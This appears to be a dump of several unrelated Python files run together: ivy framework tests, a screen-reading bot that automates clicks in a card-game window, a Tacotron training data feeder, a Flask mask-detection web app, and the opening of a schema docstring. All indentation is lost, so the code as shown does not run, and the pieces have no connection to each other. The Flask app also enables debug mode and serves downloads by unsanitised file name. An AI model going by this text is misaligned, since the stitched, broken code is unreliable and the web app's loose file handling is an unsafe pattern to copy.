true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_reduce)
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_repeat)
# profiler
def test_profiler(dev, call):
# ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
# log dir
this_dir = os.path.dirname(os.path.realpath(__file__))
log_dir = os.path.join(this_dir, '../log')
# with statement
with ivy.Profiler(log_dir):
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# start and stop methods
profiler = ivy.Profiler(log_dir)
profiler.start()
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
profiler.stop()
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
@pytest.mark.parametrize(
"x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_update(x_n_new, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace updates in wrapped mode
pytest.skip()
x_orig, new_val = x_n_new
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
new_val = tensor_fn(new_val, 'float32', dev)
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_update(x_orig, new_val)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_decrement(x_n_dec, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace decrements in wrapped mode
pytest.skip()
x_orig, dec = x_n_dec
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
dec = tensor_fn(dec, 'float32', dev)
new_val = x_orig - dec
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_decrement(x_orig, dec)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_increment(x_n_inc, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace increments in wrapped mode
pytest.skip()
x_orig, inc = x_n_inc
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
inc = tensor_fn(inc, 'float32', dev)
new_val = x_orig + inc
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_increment(x_orig, inc)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
|
GameHelper.py
|
# -*- coding: utf-8 -*-
# Created by: Vincentzyx
import win32gui
import win32ui
import win32api
from ctypes import windll
from PIL import Image
import cv2
import pyautogui
import matplotlib.pyplot as plt
import numpy as np
import os
import time
import threading
from win32con import WM_LBUTTONDOWN, MK_LBUTTON, WM_LBUTTONUP, WM_MOUSEMOVE
import multiprocessing as mp
from PyQt5 import QtGui, QtWidgets, QtCore
from PyQt5.QtCore import QTime, QEventLoop
Pics = {}
ReqQueue = mp.Queue()
ResultQueue = mp.Queue()
Processes = []
def GetSingleCardQueue(reqQ, resQ, Pics):
while True:
while not reqQ.empty():
image, i, sx, sy, sw, sh, checkSelect = reqQ.get()
result = GetSingleCard(image, i, sx, sy, sw, sh, checkSelect, Pics)
del image
if result is not None:
resQ.put(result)
time.sleep(0.01)
def ShowImg(image):
plt.imshow(image)
plt.show()
def DrawRectWithText(image, rect, text):
img = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
x, y, w, h = rect
img2 = cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
img2 = cv2.putText(img2, text, (x, y + 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 2)
return Image.fromarray(cv2.cvtColor(img2, cv2.COLOR_BGR2RGB))
def CompareCard(card):
order = {"3": 0, "4": 1, "5": 2, "6": 3, "7": 4, "8": 5, "9": 6, "T": 7, "J": 8, "Q": 9, "K": 10, "A": 11, "2": 12,
"X": 13, "D": 14}
return order[card]
def CompareCardInfo(card):
order = {"3": 0, "4": 1, "5": 2, "6": 3, "7": 4, "8": 5, "9": 6, "T": 7, "J": 8, "Q": 9, "K": 10, "A": 11, "2": 12,
"X": 13, "D": 14}
return order[card[0]]
def CompareCards(cards1, cards2):
if len(cards1) != len(cards2):
return False
cards1.sort(key=CompareCard)
cards2.sort(key=CompareCard)
for i in range(0, len(cards1)):
if cards1[i] != cards2[i]:
return False
return True
def GetListDifference(l1, l2):
temp1 = []
temp1.extend(l1)
temp2 = []
temp2.extend(l2)
for i in l2:
if i in temp1:
temp1.remove(i)
for i in l1:
if i in temp2:
temp2.remove(i)
return temp1, temp2
def FindImage(fromImage, template, threshold=0.9):
w, h, _ = template.shape
fromImage = cv2.cvtColor(np.asarray(fromImage), cv2.COLOR_RGB2BGR)
res = cv2.matchTemplate(fromImage, template, cv2.TM_CCOEFF_NORMED)
loc = np.where(res >= threshold)
points = []
for pt in zip(*loc[::-1]):
points.append(pt)
return points
def GetSingleCard(image, i, sx, sy, sw, sh, checkSelect, Pics):
cardSearchFrom = 0
AllCardsNC = ['rD', 'bX', '2', 'A', 'K', 'Q', 'J', 'T', '9', '8', '7', '6', '5', '4', '3']
currCard = ""
ci = cardSearchFrom
while ci < len(AllCardsNC):
if "r" in AllCardsNC[ci] or "b" in AllCardsNC[ci]:
result = pyautogui.locate(needleImage=Pics["m" + AllCardsNC[ci]], haystackImage=image,
region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
if result is not None:
cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
cardSearchFrom = ci
currCard = AllCardsNC[ci][1]
cardInfo = (currCard, cardPos)
return cardInfo
break
else:
outerBreak = False
for card_type in ["r", "b"]:
result = pyautogui.locate(needleImage=Pics["m" + card_type + AllCardsNC[ci]],
haystackImage=image,
region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
if result is not None:
cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
cardSearchFrom = ci
currCard = AllCardsNC[ci]
cardInfo = (currCard, cardPos)
outerBreak = True
return cardInfo
break
if outerBreak:
break
if ci == len(AllCardsNC) - 1 and checkSelect == 0:
checkSelect = 1
ci = cardSearchFrom - 1
ci += 1
return None
def RunThreads():
for file in os.listdir("pics"):
info = file.split(".")
if info[1] == "png":
tmpImage = Image.open("pics/" + file)
Pics.update({info[0]: tmpImage})
for ti in range(20):
p = mp.Process(target=GetSingleCardQueue, args=(ReqQueue, ResultQueue, Pics))
p.start()
def LocateOnImage(image, template, region=None, confidence=0.9):
if region is not None:
x, y, w, h = region
imgShape = image.shape
image = image[y:y+h, x:x+w,:]
res = cv2.matchTemplate(image, template, cv2.TM_CCOEFF_NORMED)
if (res >= confidence).any():
return True
else:
return None
class GameHelper:
def __init__(self):
self.ScreenZoomRate = 1.25
self.Pics = {}
self.PicsCV = {}
self.Handle = win32gui.FindWindow("Hlddz", None)
self.Interrupt = False
self.RealRate = (1796, 1047)
for file in os.listdir("./pics"):
info = file.split(".")
if info[1] == "png":
tmpImage = Image.open("./pics/" + file)
imgCv = cv2.imread("./pics/" + file)
self.Pics.update({info[0]: tmpImage})
self.PicsCV.update({info[0]: imgCv})
def Screenshot(self, region=None): # -> (im, (left, top))
hwnd = self.Handle
# im = Image.open(r"C:\Users\q9294\Desktop\llc.png")
# im = im.resize((1796, 1047))
# return im, (0,0)
left, top, right, bot = win32gui.GetWindowRect(hwnd)
width = right - left
height = bot - top
self.RealRate = (width, height)
width = int(width / self.ScreenZoomRate)
height = int(height / self.ScreenZoomRate)
hwndDC = win32gui.GetWindowDC(hwnd)
mfcDC = win32ui.CreateDCFromHandle(hwndDC)
saveDC = mfcDC.CreateCompatibleDC()
saveBitMap = win32ui.CreateBitmap()
saveBitMap.CreateCompatibleBitmap(mfcDC, width, height)
saveDC.SelectObject(saveBitMap)
result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 0)
bmpinfo = saveBitMap.GetInfo()
bmpstr = saveBitMap.GetBitmapBits(True)
im = Image.frombuffer(
"RGB",
(bmpinfo['bmWidth'], bmpinfo['bmHeight']),
bmpstr, 'raw', 'BGRX', 0, 1)
win32gui.DeleteObject(saveBitMap.GetHandle())
saveDC.DeleteDC()
mfcDC.DeleteDC()
win32gui.ReleaseDC(hwnd, hwndDC)
im = im.resize((1798, 1047))
if region is not None:
im = im.crop((region[0], region[1], region[0] + region[2], region[1] + region[3]))
if result:
return im, (left, top)
else:
return None, (0, 0)
def LocateOnScreen(self, templateName, region, confidence=0.9):
image, _ = self.Screenshot()
return pyautogui.locate(needleImage=self.Pics[templateName],
haystackImage=image, region=region, confidence=confidence)
def ClickOnImage(self, templateName, region=None, confidence=0.9):
image, _ = self.Screenshot()
result = pyautogui.locate(needleImage=self.Pics[templateName], haystackImage=image, confidence=confidence, region=region)
if result is not None:
self.LeftClick((result[0], result[1]))
def GetCardsState(self, image):
st = time.time()
imgCv = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
states = []
cardStartPos = pyautogui.locate(needleImage=self.Pics["card_edge"], haystackImage=image,
region=(313, 747, 1144, 200), confidence=0.85)
if cardStartPos is None:
return []
sx = cardStartPos[0] + 10
cardSearchFrom = 0
sy, sw, sh = 770, 50, 55
for i in range(0, 20):
haveWhite = LocateOnImage(imgCv, self.PicsCV["card_white"], region=(sx + 50 * i, sy, 60, 60), confidence=0.9)
if haveWhite is not None:
break
result = LocateOnImage(imgCv, self.PicsCV["card_upper_edge"], region=(sx + 50 * i, 720, sw, 50), confidence=0.9)
checkSelect = 0
if result is not None:
result = LocateOnImage(imgCv, self.PicsCV["card_overlap"], region=(sx + 50 * i, 750, sw, 50), confidence=0.85)
if result is None:
checkSelect = 1
states.append(checkSelect)
print("GetStates Costs ", time.time()-st)
return states
def GetCards(self, image):
st = time.time()
imgCv = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
cardStartPos = pyautogui.locate(needleImage=self.Pics["card_edge"], haystackImage=image,
region=(313, 747, 1144, 200), confidence=0.85)
if cardStartPos is None:
return [],[]
sx = cardStartPos[0] + 10
AllCardsNC = ['rD', 'bX', '2', 'A', 'K', 'Q', 'J', 'T', '9', '8', '7', '6', '5', '4', '3']
hand_cards = []
select_map = []
cardSearchFrom = 0
sy, sw, sh = 770, 50, 55
for i in range(0, 20):
# haveWhite = pyautogui.locate(needleImage=self.Pics["card_white"], haystackImage=image,
# region=(sx + 50 * i, sy, 60, 60), confidence=0.8)
haveWhite = LocateOnImage(imgCv, self.PicsCV["card_white"], region=(sx + 50 * i, sy, 60, 60), confidence=0.9)
if haveWhite is not None:
break
result = LocateOnImage(imgCv, self.PicsCV["card_upper_edge"], region=(sx + 50 * i, 720, sw, 50), confidence=0.9)
# result = pyautogui.locate(needleImage=self.Pics["card_upper_edge"], haystackImage=image,
# region=(sx + 50 * i, 720, sw, 50), confidence=0.9)
checkSelect = 0
if result is not None:
# result = pyautogui.locate(needleImage=self.Pics['card_overlap'], haystackImage=image,
# region=(sx + 50 * i, 750, sw, 50), confidence=0.85)
result = LocateOnImage(imgCv, self.PicsCV["card_overlap"], region=(sx + 50 * i, 750, sw, 50), confidence=0.85)
if result is None:
checkSelect = 1
select_map.append(checkSelect)
currCard = ""
ci = cardSearchFrom
while ci < len(AllCardsNC):
if "r" in AllCardsNC[ci] or "b" in AllCardsNC[ci]:
result = LocateOnImage(imgCv, self.PicsCV["m" + AllCardsNC[ci]], region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.91)
# result = pyautogui.locate(needleImage=self.Pics["m" + AllCardsNC[ci]], haystackImage=image,
# region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
if result is not None:
cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
cardSearchFrom = ci
currCard = AllCardsNC[ci][1]
cardInfo = (currCard, cardPos)
hand_cards.append(cardInfo)
else:
outerBreak = False
for card_type in ["r", "b"]:
result = LocateOnImage(imgCv, self.PicsCV["m" + card_type + AllCardsNC[ci]], region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.91)
# result = pyautogui.locate(needleImage=self.Pics["m" + card_type + AllCardsNC[ci]],
# haystackImage=image,
# region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
if result is not None:
cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
cardSearchFrom = ci
currCard = AllCardsNC[ci]
cardInfo = (currCard, cardPos)
hand_cards.append(cardInfo)
outerBreak = True
break
if outerBreak:
break
if ci == len(AllCardsNC) - 1 and checkSelect == 0:
checkSelect = 1
ci = cardSearchFrom - 1
ci += 1
QtWidgets.QApplication.processEvents(QEventLoop.AllEvents, 10)
print("GetCards Costs ", time.time()-st)
return hand_cards, select_map
def LeftClick(self, pos):
x, y = pos
x = (x / 1798) * self.RealRate[0]
y = (y / 1047) * self.RealRate[1]
x = int(x)
y = int(y)
lParam = win32api.MAKELONG(x, y)
win32gui.PostMessage(self.Handle, WM_MOUSEMOVE, MK_LBUTTON, lParam)
win32gui.PostMessage(self.Handle, WM_LBUTTONDOWN, MK_LBUTTON, lParam)
win32gui.PostMessage(self.Handle, WM_LBUTTONUP, MK_LBUTTON, lParam)
def SelectCards(self, cards):
cards = [card for card in cards]
tobeSelected = []
tobeSelected.extend(cards)
image, windowPos = self.Screenshot()
handCardsInfo, states = self.GetCards(image)
cardSelectMap = []
for card in handCardsInfo:
c = card[0]
if c in tobeSelected:
cardSelectMap.append(1)
tobeSelected.remove(c)
else:
cardSelectMap.append(0)
clickMap = []
handcards = [c[0] for c in handCardsInfo]
for i in range(0, len(cardSelectMap)):
if cardSelectMap[i] == states[i]:
clickMap.append(0)
else:
clickMap.append(1)
while 1 in clickMap:
for i in range(0, len(clickMap)):
if clickMap[i] == 1:
self.LeftClick(handCardsInfo[i][1])
break
time.sleep(0.1)
if self.Interrupt:
break
image, _ = self.Screenshot()
states = self.GetCardsState(image)
clickMap = []
for i in range(0, len(cardSelectMap)):
if cardSelectMap[i] == states[i]:
clickMap.append(0)
else:
clickMap.append(1)
QtWidgets.QApplication.processEvents(QEventLoop.AllEvents, 10)
|
feeder.py
|
import os
import threading
import time
import traceback
import numpy as np
import tensorflow as tf
from infolog import log
from sklearn.model_selection import train_test_split
from tacotron.utils.text import text_to_sequence
_batches_per_group = 32
class Feeder:
"""
Feeds batches of data into queue on a background thread.
"""
def __init__(self, coordinator, metadata_filename, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._cleaner_names = [x.strip() for x in hparams.cleaners.split(',')]
self._train_offset = 0
self._test_offset = 0
# Load metadata
self._mel_dir = os.path.join(os.path.dirname(metadata_filename), 'mels')
self._linear_dir = os.path.join(os.path.dirname(metadata_filename), 'linear')
with open(metadata_filename, encoding='utf-8') as f:
self._metadata = [line.strip().split('|') for line in f]
frame_shift_ms = hparams.hop_size / hparams.sample_rate
hours = sum([int(x[4]) for x in self._metadata]) * frame_shift_ms / (3600)
log('Loaded metadata for {} examples ({:.2f} hours)'.format(len(self._metadata), hours))
# Train test split
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches is not None
test_size = (hparams.tacotron_test_size if hparams.tacotron_test_size is not None
else hparams.tacotron_test_batches * hparams.tacotron_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.tacotron_data_random_state)
# Make sure test_indices is a multiple of batch_size else round up
len_test_indices = self._round_down(len(test_indices), hparams.tacotron_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.tacotron_batch_size
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches == self.test_steps
# pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
# explicitely setting the padding to a value that doesn't originally exist in the spectogram
# to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
# Mark finished sequences with 1s
self._token_pad = 1.
with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
self._placeholders = [
tf.placeholder(tf.int32, shape=(None, None), name='inputs'),
tf.placeholder(tf.int32, shape=(None, ), name='input_lengths'),
tf.placeholder(tf.float32, shape=(None, None, hparams.num_mels), name='mel_targets'),
tf.placeholder(tf.float32, shape=(None, None), name='token_targets'),
tf.placeholder(tf.float32, shape=(None, None, hparams.num_freq), name='linear_targets'),
tf.placeholder(tf.int32, shape=(None, ), name='targets_lengths'),
]
# Create queue for buffering data
queue = tf.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32], name='input_queue')
self._enqueue_op = queue.enqueue(self._placeholders)
self.inputs, self.input_lengths, self.mel_targets, self.token_targets, self.linear_targets, self.targets_lengths = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
self.token_targets.set_shape(self._placeholders[3].shape)
self.linear_targets.set_shape(self._placeholders[4].shape)
self.targets_lengths.set_shape(self._placeholders[5].shape)
# Create eval queue for buffering eval data
eval_queue = tf.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32], name='eval_queue')
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, self.eval_token_targets, \
self.eval_linear_targets, self.eval_targets_lengths = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_linear_targets.set_shape(self._placeholders[4].shape)
self.eval_targets_lengths.set_shape(self._placeholders[5].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
thread.daemon = True # Thread will close when parent quits
thread.start()
thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
thread.daemon = True # Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
# Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
linear_target = np.load(os.path.join(self._linear_dir, meta[2]))
return (input_data, mel_target, token_target, linear_target, len(mel_target))
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
# Test on entire test set
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i + n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
return batches, r
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i + n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
# Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
# Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
linear_target = np.load(os.path.join(self._linear_dir, meta[2]))
return (input_data, mel_target, token_target, linear_target, len(mel_target))
def _prepare_batch(self, batch, outputs_per_step):
np.random.shuffle(batch)
inputs = self._prepare_inputs([x[0] for x in batch])
input_lengths = np.asarray([len(x[0]) for x in batch], dtype=np.int32)
mel_targets = self._prepare_targets([x[1] for x in batch], outputs_per_step)
# Pad sequences with 1 to infer that the sequence is done
token_targets = self._prepare_token_targets([x[2] for x in batch], outputs_per_step)
linear_targets = self._prepare_targets([x[3] for x in batch], outputs_per_step)
targets_lengths = np.asarray([x[-1] for x in batch], dtype=np.int32) # Used to mask loss
return (inputs, input_lengths, mel_targets, token_targets, linear_targets, targets_lengths)
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs])
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
return np.stack([self._pad_target(t, self._round_up(max_len, alignment)) for t in targets])
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
return np.stack([self._pad_token_target(t, self._round_up(max_len, alignment)) for t in targets])
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode='constant', constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode='constant', constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode='constant', constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
|
maskdetection.py
|
import os
import threading
import argparse
import filetype
from flask import Flask, Response, make_response, send_file
from flask import flash, request, redirect, jsonify
from flask import render_template
from models.realStream import RealStream
from models.facenet import FaceNet
from models.util import utils
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
TEMPLATES_AUTO_RELOAD = True
# initialize a flask object
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route("/")
def index():
# return the rendered template
return render_template("index.html")
@app.route("/realstream/")
def realStream():
# start a thread that will start a video stream
global t
# start a thread that will perform mask detection
rs = RealStream()
t = threading.Thread(target=rs.mask_detection)
t.daemon = True
t.start()
# forward to real stream page
return render_template("realStream.html")
@app.route("/staticstream/")
def staticstream():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to static stream page
return render_template("staticStream.html")
@app.route("/imageprocess/")
def imageprocess():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
return render_template("imageprocess.html")
@app.route("/folderscan/")
def folderscan():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to static stream page
return render_template("folderscan.html")
@app.route("/about/")
def about():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to about page
return render_template("about.html")
@app.route("/contact/")
def contact():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to contact page
return render_template("contact.html")
#---------------------------------------------------------------------
#----------------------------Functions--------------------------------
#---------------------------------------------------------------------
@app.route("/uploadfile", methods=['GET', 'POST'])
def uploadfile():
if request.method == 'POST':
# save file
file = request.files['uploadFile']
result = utils.save_file(file)
if result == 0:
print("file saved failed.")
else:
print("file saved successful.")
# call function to process it
rs = RealStream()
# check file type
filepath = utils.get_file_path('webApp/uploads', file.filename)
if filetype.is_image(filepath):
output = rs.processimage(file.filename)
elif filetype.is_video(filepath):
output = rs.processvideo(file.filename)
else:
print("delete it.")
# allow user to download after process it
return jsonify({'filename': output})
@app.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
rs = RealStream()
return Response(rs.generate, mimetype = "multipart/x-mixed-replace; boundary=frame")
@app.route("/download/<fileName>", methods=['GET'])
def download(fileName):
file = os.path.join(UPLOAD_FOLDER, fileName)
response = make_response(send_file(file))
response.headers["Content-Disposition"] = "attachment; filename={};".format(file)
return response
@app.route("/content_dash", methods=['GET'])
def content_dash():
data = request.values
if data['type'] == 'imagecode':
return render_template('imagecode.html')
if data['type'] == 'imageprocess':
return render_template('imageprocess.html')
if data['type'] == 'folderscan':
return render_template('folderscan.html')
@app.route('/uploadimage', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'uploadImage' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['uploadImage']
# save file first
utils.save_file(file)
# encoding and save into db
md = FaceNet()
username = request.form['username']
md.save_encode_db(username, file.filename)
return jsonify('success')
# execute function
if __name__ == '__main__':
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--ip", type=str, default="127.0.0.1", help="ip address")
ap.add_argument("-o", "--port", type=int, default=8000, help="port number of the server")
args = vars(ap.parse_args())
# start the flask app
app.run(host=args["ip"], port=args["port"], debug=True, threaded=True, use_reloader=False)
|
schema.py
|
"""
Schemas
=======
Schemas defines the structure of the fields of your table. The schema handles
fields validations, and ensure index unicity. There are 5 main concepts around
the schemas:
**Indexes**
An index defines which key (or set of keys) should be unique within your table.
The schema will perform checks on those indexes whenever a row is being created
or updated.
Some examples:
1. If you have a user table, and need usernames and emails to be unique, you
will have then 2 indexes.
2. If you have a session token table with a user id and a token number, you can
have one index composed of two keys: user id (hash) and token number (range)
**Validators**
Validators are health checks on the provided data. For example: if you have a
field `age`, the field is most likely going to have a defined range (minimum
and maximum). If a value provided is not valid, the field validator throws an
exception, caught by the schema, and returned as part of the response (so if
more than one field is invalid, the user can be informed.)
**Extensions**
Extensions are only available for `fetch` and `fetch_one` method. They are
populating more fields on the returned object.
For instance: if you have a user table, and a profile table, you probably want
the user to be able to get the profile as part of the same response. So
`profile` can be an extension of user.
**Generated fields**
